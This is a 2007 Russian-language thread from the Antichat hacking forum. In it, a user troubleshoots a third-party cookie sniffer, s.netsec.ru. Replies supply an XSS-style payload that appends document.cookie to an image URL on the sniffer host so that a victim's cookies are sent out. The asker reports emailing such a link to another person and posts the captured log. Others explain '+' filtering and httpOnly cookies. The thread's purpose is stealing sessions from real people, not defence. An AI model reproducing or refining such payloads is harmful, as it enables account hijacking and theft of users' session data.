ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Снифер s.netsec.ru, cookie
  #1  
Старый 21.11.2007, 20:12
<<MEN>>
Banned
Регистрация: 08.11.2007
Сообщений: 55
Провел на форуме:
116261

Репутация: 13
По умолчанию Снифер s.netsec.ru, cookie

Скажите,пожалуйста почему сниффер от античата..
http://s.netsec.ru
Не тырит куки..?только Ип и ссесию..в чём проблема,подскажите.
 
Ответить с цитированием

  #2  
Старый 21.11.2007, 20:34
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от <<MEN>>  
Скажите,пожалуйста почему сниффер от античата..
http://s.netsec.ru
Не тырит куки..?только Ип и ссесию..в чём проблема,подскажите.
Или ты не правильно что то делаешь.. прочитай заново доки.. или в куках только сессия находиться и все... третьево не дано... конечно если сам снифер не тупит)
 
Ответить с цитированием

  #3  
Старый 22.11.2007, 09:11
<<MEN>>
Banned
Регистрация: 08.11.2007
Сообщений: 55
Провел на форуме:
116261

Репутация: 13
По умолчанию

вроди всё правильно делаю..
http://s.netsec.ru/Ник.gif
 
Ответить с цитированием

  #4  
Старый 22.11.2007, 09:47
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

<<men>>, на нетсеке все норм работает + это не снифер античата
 
Ответить с цитированием

  #5  
Старый 22.11.2007, 13:21
Zick
Новичок
Регистрация: 22.11.2007
Сообщений: 2
Провел на форуме:
10158

Репутация: 0
По умолчанию

если он ворует хотя бы сессию, значит сниффер работает и ты все правильно сделал. просто пользователь, который зашел на сниффер, был не авторизован.
 
Ответить с цитированием

  #6  
Старый 22.11.2007, 13:55
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

или у кук httpOnly
 
Ответить с цитированием

  #7  
Старый 22.11.2007, 14:46
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Цитата:
Сообщение от <<MEN>>  
вроди всё правильно делаю..
http://s.netsec.ru/Ник.gif
если нужны куки, то:
Цитата:
"http://s.netsec.ru/имя.gif?"+document.cookie;
к томуже может фильтроватся символ "+"
 
Ответить с цитированием

  #8  
Старый 22.11.2007, 16:09
<<MEN>>
Banned
Регистрация: 08.11.2007
Сообщений: 55
Провел на форуме:
116261

Репутация: 13
По умолчанию

ясно)Я сделал как тут говарилось отправил челу письмо со ссылкой сниффа http://s.netsec.ru/ник.gif?"+document.cookie;
И мне пришло:
Time: 22.11 -02.27.53
IP: тут ИП
Host: тут сессия
Browser:Имя браузера
String:" document.cookie;
получатся я так понял он куки не свиснул..

Последний раз редактировалось <<MEN>>; 22.11.2007 в 16:37..
 
Ответить с цитированием

  #9  
Старый 22.11.2007, 17:29
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

"+" фильтруется.
 
Ответить с цитированием

  #10  
Старый 22.11.2007, 22:01
<<MEN>>
Banned
Регистрация: 08.11.2007
Сообщений: 55
Провел на форуме:
116261

Репутация: 13
По умолчанию

тогда получается сниффер бысмыселен..я так понимаю.
Потому,что ссесию если и сворует определение по кукам,куки свиснуть не сможет т.к. фильтрация..
Тока ИП.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Фальсификация cookie k00p3r Чужие Статьи 6 11.04.2010 19:36
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Cookies Болталка 9 11.01.2004 03:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ